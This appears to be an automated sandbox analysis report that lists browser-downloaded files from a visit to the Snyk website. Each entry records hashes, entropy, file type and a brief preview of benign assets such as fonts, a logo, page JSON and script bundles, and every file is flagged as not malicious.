                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" height="168px" width="559px" version="1.1" viewBox="0 0 559 168">. <path fill="#1ED760" d="m83.996 0.277c-46.249 0-83.743 37.493-83.743 83.742 0 46.251 37.494 83.741 83.743 83.741 46.254 0 83.744-37.49 83.744-83.741 0-46.246-37.49-83.738-83.745-83.738l0.001-0.004zm38.404 120.78c-1.5 2.46-4.72 3.24-7.18 1.73-19.662-12.01-44.414-14.73-73.564-8.07-2.809 0.64-5.609-1.12-6.249-3.93-0.643-2.81 1.11-5.61 3.926-6.25 31.9-7.288 59.263-4.15 81.337 9.34 2.46 1.51 3.24 4.72 1.73 7.18zm10.25-22.802c-1.89 3.072-5.91 4.042-8.98 2.152-22.51-13.836-56.823-17.843-83.448-9.761-3.453 1.043-7.1-0.903-8.148-4.35-1.04-3.453 0.907-7.093 4.354-8.143 30.413-9.228 68.222-4.758 94.072 11.127 3.07 1.89 4.04 5.91 2.15 8.976v-0.001zm0.88-23.744c-26.99-16.031-71.52-17.505-97.289-9.684-4.138 1.255-8.514-1.081-9.768-5.219-1.254-4.14 1.08-8.513 5.221-9.771 29.581-8.98 78.756-7.245 109.83 11.202 3.73 2.209 4.95 7.016 2.74 10.73
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65492), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):147847
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.125449075403839
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:trCDhUk0Rwiws4/MSX2sBEzlTXYkCRzsy:0DikUwiu9X2KEzRYkCp
                                                                                                                                                                                                                                                                                                              MD5:0005E618393045EACCC86E88590B984B
                                                                                                                                                                                                                                                                                                              SHA1:88B59ACEA5C397F0AA8FA5A423786AC168E4DD72
                                                                                                                                                                                                                                                                                                              SHA-256:4332E385EE6ADC0CF9BBB47067B1CF923076BAB58F59360283AE15ADFE3A6AA8
                                                                                                                                                                                                                                                                                                              SHA-512:F012B6267A736D238F2CA1C7B91E3F43D1AE4CE67507609AAD6AC54CD409E5117F76CA90DF9C41863FB87DD980D9385C06A2050DAE01AB15D5A5969F61E7D385
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json?slug=product&slug=open-source-security-management
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4lOqYRNZrI6rMIJFuDgvhh","type":"Entry","createdAt":"2022-10-20T00:48:56.205Z","updatedAt":"2023-09-22T17:30:06.826Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":106,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk Open Source","title":"Open Source Security Management | SCA Tool | Snyk","slug":"open-source-security-management","uri":"product/open-source-security-management","pageLocalization":["de","fr","ja","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4HLqvq9asbGHkX5FPN4al0","type":"Entry","createdAt":"2022-10-20T00:48:56.296Z","updatedAt":"2023-04-11T18:35:33.223Z","environment":{"sys":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11978)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):304034
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.62049973131221
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:kCjRo3k4a7bdBvif2s3qXk9n++0WBBNy2Uzc:bj2kr7xBKtWQ
                                                                                                                                                                                                                                                                                                              MD5:1D73AAD01969330BB73BA0D88DEEAD41
                                                                                                                                                                                                                                                                                                              SHA1:E30CABFC41E930795E154C71517E9344578C3B6A
                                                                                                                                                                                                                                                                                                              SHA-256:44920C76994A0B904549DD215DF0CBD09C05EFBB85AB112FD7CCAAAAAFEC3503
                                                                                                                                                                                                                                                                                                              SHA-512:811857CFF2C39916FA30207737D41E4668C23E34AFC95EEB6E5A54210BAD7013A0071D80D7724A9F60B48955280A9A55B084662B47697455C917709C04328913
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":31,"vtp_rules":["list","^www\\.snyk\\.marketing","snyk\\.io","(app|go|security|support|learn|docs|dev|training)\\.snyk\\.io","www\\.devseccon\\.com"],"tag_id":106},{"function":"__ogt_dma","priority":21,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":108},{"function":"__ogt_1p_data_v2","priority":21,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phon
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (738), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.72325415847929
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:BR2awV5B8/m+/quznFu+OPx90+WP+/yiJEvvgfHfjum9dXn:6nVfsm+/dQzPx9mP+yiJEv0HfyMp
                                                                                                                                                                                                                                                                                                              MD5:8606DD534193A9C6F42925CEAB334554
                                                                                                                                                                                                                                                                                                              SHA1:2434ABE998EE4C986EF8B609C6F8759B5692FD95
                                                                                                                                                                                                                                                                                                              SHA-256:4B5CA810D29591FA58F9643F2D97FE26AE3637AE5F91F2A470688F7E76876024
                                                                                                                                                                                                                                                                                                              SHA-512:0EE52C0F28CE81E6D44E08C047275EE6416672DB05B73C6CAE133AFB713E08B717FB51414C82CAA5FC8A8AF652654B8F29AA25251AECA2ABD0F0F9B3886EE2C1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:self.__SSG_MANIFEST=new Set(["\u002F","\u002F404","\u002F[...slug]","\u002Fappsecmap\u002Fshare","\u002Farticles\u002F[...slug]","\u002Fblog\u002F[slug]","\u002Fcase-studies\u002F[slug]","\u002Fcode-checker","\u002Fcode-checker\u002F[...slug]","\u002Fevents\u002F[slug]","\u002Flearn\u002F[...slug]","\u002Flearn\u002Ftopic\u002F[slug]","\u002Flp\u002F[slug]","\u002Fnews\u002F[slug]","\u002Fpodcasts\u002Fthe-secure-developer\u002F[slug]","\u002Fpolicies\u002F[slug]","\u002Fprocurement\u002F[slug]","\u002Freports","\u002Freports\u002F[slug]","\u002Fschedule-a-demo","\u002Fsecuritylabs","\u002Fseries","\u002Fseries\u002F[...slug]","\u002Fstart\u002F[slug]","\u002Fvideos\u002F[slug]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):133422
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.955609429117514
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:zW1GElyD5niq4dCmRC5cYQAgFi69ntXPQLGBq15TVaCM0M0WwJiVKxCtx2JDvwxo:Vm1tqM8iAYut
                                                                                                                                                                                                                                                                                                              MD5:7397F55DBF3B3FE70093C2C3D4DE883A
                                                                                                                                                                                                                                                                                                              SHA1:94F2AD2DA5236AE58274356024F7C797F1E340DB
                                                                                                                                                                                                                                                                                                              SHA-256:0F59031F1817F80406B42AA0E0F6BE5952E25CB36DE649D84AECDDBF94E7B0E2
                                                                                                                                                                                                                                                                                                              SHA-512:33D3531527071AAACCDECFDFC7B23CC44001FD37C88EF989F1B699997EA1C8C860A549B42E29169AD5B84492BD56103BA0CB7B2922A554BC484016D7883A7120
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:"https://aggregator.service.usercentrics.eu/aggregate/en?templates=6ySvKQ7jnpjp6y@1.1.0,8eIqa_sKr@8.1.1,9V8bg4D63@9.6.8,9y-4-D2PG@3.3.1,A_gL7a2nQ_pFlo@1.0.0,BJ59EidsWQ@25.7.28,BJTzqNi_i-m@5.3.9,BJz7qNsdj-7@15.8.19,Bklbg5NodobQ@5.0.1,D1_CKTzWP@3.1.2,F-REmjGq7@3.2.1,H1Vl5NidjWX@40.17.45,HkIVcNiuoZX@6.3.4,HkPBYFofN@10.3.1,Hko_qNsui-Q@14.5.15,HkocEodjb7@52.11.41,Hkx754i_iWm@8.3.6,HyP_q4sdobm@10.4.6,JQ2XQxIk@9.6.9,M6Q7giJoz@1.4.3,QAuuBnCiD@1.0.0,QU1vpIg7p@1.0.1,S1_9Vsuj-Q@15.7.22,S1hmcVouiZm@6.2.2,S1pcEj_jZX@21.10.9,S1zkWcVi_oWm@4.2.0,SZJlEEMFe@1.0.1,Sk9kb5VoOi-7@5.1.3,Skj79NodobQ@8.1.3,Sy7BxqEo_oZQ@4.2.0,TeSBtxNX_@1.0.1,V2XAHiqQ9@1.0.1,YaNSRn_HaS-0E9@1.1.0,by3sOSyV-gSwm6@1.1.0,dsS7z9Hv4@1.1.4,e9t04l6TWx1FWs@1.1.0,gkEBFID-V@5.4.5,hQROV2qf7@9.2.4,hy2RKRYpEyupfZ@1.1.0,jzMEq56vW@1.4.3,o5fE0n55PMqzfd@1.1.0,r1HocEjOiWm@7.2.1,rJJjcVouoZ7@8.3.6,ryDQcVoOoZQ@8.2.4,sVUWGhCw7ZYXK8@1.0.0,upbSiLk92JzB4p@1.1.0,zaEwbnbvfaDMAQ@1.1.0"
                                                                                                                                                                                                                                                                                                              Preview:{"templates":[{"adminSettingsId":[],"dataAttributes":[],"dataProcessors":[],"dataProcessor":"Sticky UTMs","dataPurposes":[],"domAttributes":[],"domElements":[],"domKeys":[],"nameOfProcessingCompany":"","addressOfProcessingCompany":"","descriptionOfService":"The sticky utm cookie captures any utms on the Snyk url a visitor first visits and has the utms follow the visitor during this specific session. If the visitor fills out a form or creates a Snyk Account/User, the sticky utms are captured in that activity which helps with accurate analytics for Snyk campaigns.","technologyUsed":[],"languagesAvailable":["en"],"dataCollectedList":[],"dataPurposesList":[],"dataRecipientsList":[],"legalBasisList":[],"retentionPeriodList":[],"subConsents":[],"cookieNames":[],"templateId":"6ySvKQ7jnpjp6y","updatedAt":"2024-05-14T18:33:26.348Z","language":"en","version":"1.1.0","isLatest":true,"isShared":false,"isHidden":false,"type":"custom","shareCustomConsent":"hidden","linkToDpa":"","defaultConsentStatu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 2207
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.777847508659921
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:XpnVCU3GhTo/508W83VbSZQJMDhBY4dJyhYtFXMwN8:XlVCjofdVboY4dTtF8wC
                                                                                                                                                                                                                                                                                                              MD5:E3B346A4F0B35B7FF884730F4C61CD2E
                                                                                                                                                                                                                                                                                                              SHA1:DF4050CE0E0F7AE7E37CE6E0290E4817FF9595D0
                                                                                                                                                                                                                                                                                                              SHA-256:0CBEE3E3F7123D4B0E5D9A72CE33548B3F6DD4141B83EF4506770A92D880DB8C
                                                                                                                                                                                                                                                                                                              SHA-512:08342B70A65A9FB908F545627503FE34564EB3032367294ED239EF058AB32F4DEEBC5533F831F3BBB58CDB5310BDC7F95414AD027BB596CD2859520FE8F210B3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:...........U.n.6.}.PX@...m.....K..".../.`..m3KS\...u....f'.........{...>;UR....gR;...3..?..N.E..H...r/+.&_.(.IQm....bV^.....</.w......<....7./.m.j].........:.U.s...0(g....a..D....n#K81Lg....D..<'......2T.....x..sf."'..;Qxjl.+.3.n........w..J%..8....q...v.$l.1L.M..FRG5~..X0....?.Zpq...t5 .+.6r......l.Pn..%.....p..7ch`3F.......lj.~..Lf:'..L!~..\.A... S3..<..0Ve5. ...n,.$uF.B$...0.'.:...H..7m..!.._^...!)#b..)W..4...k*.6......#..sM..dF....i.....X..D..C....g..[.....2..Q..M..sZ.%~x.s[...b.h+......J...Z..hp....E..Kt.ByT...n..T.w_..J..........%.,U.9.P......%e.X...j'.....~..Y.C.Bj=...X...)....j.Bl...q...K....=....~j.p0..K.K..Ap.k...w^x.............O=.L.=KFw.."j.......:v..1.R.lj......7Z.=.f...X...&.#.>...IJz.W.MP.6.C...a...{.4....Yh...#.}.P`..[..R....n.4....%.......H..X....d..0\;V?..$C....L{.K.a?...v".)..L;.........G3?.:...i.....y.A. L+..D.[.....Ap..(9.r...G...m.7n>.8...Y....(`.;.......n......_....S.VGy.Zz..G......zP.......,...(..^b!K..&i....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 20144, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):20144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988855976137295
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:p/Je0pAJ40shogIMZZuf7NA/0wh/zhQktl6k0s:p/JHpl0shorJ4NlhjwS
                                                                                                                                                                                                                                                                                                              MD5:214F75E42AA5CFCA07257CBF8C64E83C
                                                                                                                                                                                                                                                                                                              SHA1:BA4BBE71D4AB266BC145305217CDF86A7777137F
                                                                                                                                                                                                                                                                                                              SHA-256:A6760631FECFE59ED152AEB2C51FDCB515AC00CD4755449016B5B34813735D00
                                                                                                                                                                                                                                                                                                              SHA-512:E8D896C8C3509941FBCE96E2847838A520B3BC8D94348B1121840A1A2A45328BE939238423A03CDFB7823CF128EEC3190DE8B4C1924553D603EF02FA856217E0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xIIzI.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......N........p..NI.............................Z..|.`..J.R..<.....$..}..Z...x.6.$..0. .... ..D.6..r.L......r.....y.B....(j''.L..)A.1.k...DEHA.O,...@..C;..SE.g.ch.{.t..F...?zW....|.r.p..dO1..-.).Q.9.Z......?v..>......).9@."..\}.(.[....I.u......mc...`...#.[.Q!.%B.("!......``c....._....:.u&~......&'.I.x.>..R.......@.4...]|f9V.u.4v.+...E.~=..{+.....]..&X...L...Z..>O.WH...Z..!.T..:..G..1....2.HR....1...U..N....}.D^.:`E.P.:._~....-Qv.....> .t;..[...B.pE.(T.W1...t.........m.....X..F...]i....$.]..e.VSt.NNo......}.=#.B.0.gds....h...ns.Tv..$<_....2F.Kd.;..\.F......B.p)|.%.<[..YJ..l..CP....F..x{...}...f.&..Ci......;...V............./....w...+.I.B.Y...r.........Q...........X.-cL.g3)...a. ..D..w./x.V...Z.`N.25/..)M&...ys../.{E.ezR:V..2V5.+....;....._.[$*J.r....A0tW.u....L........*&T....~.z........10...3%.`%..urP i.9...M.i4M....L...q...N.........%...w.......?7>.........5.!..|8..."N...Y.....E...M|..._N..v{].._..Ex..J.7....aJ;...#u..W...Sk.9...Vn.]......D..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1896), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1896
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.298303894686635
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:ibj41U+IRWczoSxw9YzrjXrBv5joWlw97WsqnFGWRfUoSxnnzbbxD1TFSAkJWMej:ibk1U+RrkrZdqVWsrWzZW//eb/pB8
                                                                                                                                                                                                                                                                                                              MD5:3157CFE467F518FA1B9E43042FD8985F
                                                                                                                                                                                                                                                                                                              SHA1:74827506BD35F1448D4C08DC262D1DB35E102925
                                                                                                                                                                                                                                                                                                              SHA-256:0799EE4F469E48C9983E2885FAC4682313DB54DCE89195FEA153D730943BB0BD
                                                                                                                                                                                                                                                                                                              SHA-512:226FA1A955CC59C72A0ABF8B69CA3E9705C9790BFF0F278B69A3FD833BD3F9C87B9D869C922A5F81532EC73586B3A6F28875CCCE0A9FB34E01DAED805D21C142
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8796],{96059:function(l,i,a){a.d(i,{Z:function(){return c}});var e=a(85893),n=a(45697),r=a.n(n),s=a(7756),t=a(44133);function o(l){var i;let{image:a,isSmall:n,hasMinHeight:r,objectFit:o="cover",priority:c,noRadius:d,className:u}=l;return(0,e.jsx)("div",{className:(0,t.Z)("w-full marg-h-auto p-relative aspect-ratio-banner",r&&"min-h-2",u),"data-component":"Banner",children:a&&(0,e.jsx)(s.Z,{src:null==a?void 0:a.src,alt:null!==(i=null==a?void 0:a.alt)&&void 0!==i?i:"",fill:!0,sizes:null==a?void 0:a.sizes,priority:c,className:(0,t.Z)("object-fit-".concat(o),!d&&(n?"radius-medium":"radius-large"))})})}o.propTypes={image:r().shape({src:r().string,alt:r().string}),isSmall:r().bool,hasMinHeight:r().bool,priority:r().bool,objectFit:r().oneOf(["cover","contain","fill","scale-down","none"])};var c=o},78796:function(l,i,a){a.r(i);var e=a(85893),n=a(24982),r=a(96059);i.default=function(l){var i,a,s,t;let{item:o}=l;return(0,e.jsx
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):18536
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.986571198050597
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                                                                                                                                                                                              MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                                                                                                                                                                                              SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                                                                                                                                                                                              SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                                                                                                                                                                                              SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6145), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6145
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.413610880345927
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Dp6cF7ZZ7IRn+DVk3+kk21uJq3faN9kV41w6C+:96k7fIRn+DVk3vk2oJq3fabkg2+
                                                                                                                                                                                                                                                                                                              MD5:F2700B090163D2C01B8AAD0ACC016E4A
                                                                                                                                                                                                                                                                                                              SHA1:F0D48E567CB7EFB774103AC85BE28079C160A644
                                                                                                                                                                                                                                                                                                              SHA-256:64DB9C0572CC47DF24F75E4EA67FA6D152D5D5D81F71C161C9A841FAB5B2C53C
                                                                                                                                                                                                                                                                                                              SHA-512:F4EBEAE01944E08CF95703FDE258E35F5C1E8FD470C85A1E2869D7DF6408CEFAB5945D6410A8F7A0AD62F2B4D5D2545904FE2E6D19BCD8CC4C28798222166B93
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/runtime~main.ca4e7fb9.js
                                                                                                                                                                                                                                                                                                              Preview:!function(e){function webpackJsonpCallback(c){for(var r,d,t=c[0],n=c[1],_=c[2],u=0,i=[];u<t.length;u++)d=t[u],a[d]&&i.push(a[d][0]),a[d]=0;for(r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r]);for(o&&o(c);i.length;)i.shift()();return f.push.apply(f,_||[]),checkDeferredModules()}function checkDeferredModules(){for(var e,c=0;c<f.length;c++){for(var r=f[c],d=!0,t=1;t<r.length;t++){var n=r[t];0!==a[n]&&(d=!1)}d&&(f.splice(c--,1),e=__webpack_require__(__webpack_require__.s=r[0]))}return e}var c={},r={6:0},a={6:0},f=[];function __webpack_require__(r){if(c[r])return c[r].exports;var a=c[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,__webpack_require__),a.l=!0,a.exports}__webpack_require__.e=function requireEnsure(e){var c=[];r[e]?c.push(r[e]):0!==r[e]&&{1:1,3:1,4:1,8:1,16:1,23:1,25:1,27:1,28:1,30:1,31:1,33:1,35:1,36:1,38:1,39:1,44:1,45:1,46:1,47:1,48:1}[e]&&c.push(r[e]=new Promise(function(c,a){for(var f="assets/css/"+({}[e]||e)+"."+{0:"31d6cfe0",1:"fdc718c4",2:"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8592)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):8928
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4178856450636195
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:A3KYWQCz/wFgswR+RD2vbtFSYsXTQKIF2b9XPSZ9sGLEyLA:A3KYZCzkT7RDyfSYs09U9/Sn8yLA
                                                                                                                                                                                                                                                                                                              MD5:1FA7B981E586665B5650AAC09848C9E4
                                                                                                                                                                                                                                                                                                              SHA1:E7B934CD7813B8E92B761F62246059157139872D
                                                                                                                                                                                                                                                                                                              SHA-256:D13B5DFDE16114A364BABCF3267A02B03569094DAE96A977C4F99267B44D2FF3
                                                                                                                                                                                                                                                                                                              SHA-512:D452914CBD7D2D4B3BD23557061F9AD67C71CCECD7392F83BCA35006E1E672F752688B60DD86A1110FF87D7FDCE46B9A817A2D6ACEA2D2A6061C8FC67D2C6324
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/webpack-1e81cdc3aa31d741.js
                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e,a,d,c,f,t,b,n,r,o,i={},u={};function s(e){var a=u[e];if(void 0!==a)return a.exports;var d=u[e]={exports:{}},c=!0;try{i[e].call(d.exports,d,d.exports,s),c=!1}finally{c&&delete u[e]}return d.exports}s.m=i,e=[],s.O=function(a,d,c,f){if(d){f=f||0;for(var t=e.length;t>0&&e[t-1][2]>f;t--)e[t]=e[t-1];e[t]=[d,c,f];return}for(var b=1/0,t=0;t<e.length;t++){for(var d=e[t][0],c=e[t][1],f=e[t][2],n=!0,r=0;r<d.length;r++)b>=f&&Object.keys(s.O).every(function(e){return s.O[e](d[r])})?d.splice(r--,1):(n=!1,f<b&&(b=f));if(n){e.splice(t--,1);var o=c();void 0!==o&&(a=o)}}return a},s.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return s.d(a,{a:a}),a},s.d=function(e,a){for(var d in a)s.o(a,d)&&!s.o(e,d)&&Object.defineProperty(e,d,{enumerable:!0,get:a[d]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce(function(a,d){return s.f[d](e,a),a},[]))},s.u=function(e){return 3263===e?"static/chunks/3263-9512e0fe9b5c3a18.js":3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):75961
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.284364477342943
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:QsOblXdRFlP6SupyNG6jtspnJWuUTzHUBDnBIuqoci+4cW/mK5NtUO6PnUZHBO8n:QDvFlP6Supyqpcu23O/ziSO87QRi8k
                                                                                                                                                                                                                                                                                                              MD5:6D77A76055D81227033363AF2F18CAF8
                                                                                                                                                                                                                                                                                                              SHA1:B1B94517954F8F8889A0822886DEA6F5AD7C931F
                                                                                                                                                                                                                                                                                                              SHA-256:19473EEBFB0672867A4438E2A015DE79FDED34B9F5AE5598BADE57EB01CF0563
                                                                                                                                                                                                                                                                                                              SHA-512:8E576150D0CB1FCB21DA5EC65C73EE2CB2E48A5F762C3926243471CAE4D0334F4D5B464A08C189A223E8E56D47C28323EFA4A053405D06BF35776C5154762FC7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/20.8c21ea18.chunk.js
